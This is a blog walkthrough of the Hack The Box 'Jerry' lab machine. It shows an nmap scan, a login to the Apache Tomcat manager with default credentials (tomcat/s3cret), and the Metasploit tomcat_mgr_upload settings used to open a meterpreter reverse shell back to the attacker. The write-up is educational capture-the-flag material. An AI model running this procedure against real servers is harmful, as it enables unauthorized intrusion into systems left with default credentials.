24
- November
2020
Posted By : Michele Pariani
HTB Jerry: Default credentials made this hack a piece of cake

In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

nmap -A -T4 -p- 10.10.10.95

The scan shows that port 8080 (HTTP) is open. Moreover, we learn that Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.

Open your browser and go to 10.10.10.95:8080 . We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us getting access to the server. Let’s click on the link.

The default page of Apache Tomcat/7.0.88 provides the link to the manager webapp.

We are asked for login credentials. We click on cancel and we are redirected to 10.10.10.95:8080/manager/html . Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to login with them.

The “403 Access Denied” page provides a set of default credentials.

It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.

We are able to login with those default credentials. We see that we can upload and deploy a WAR file from this page. Let’s see if we can exploit this!

Exploit Jerry

Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload java/meterpreter/reverse_tcp (a staged payload) this time.

set rhosts 10.10.10.95

set lhost <Your IPv4 address>

set rport 8080

set HttpUsername tomcat

set HttpPassword s3cret

We get a shell and we have access to the Administrator folders and files.

Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Leave a Reply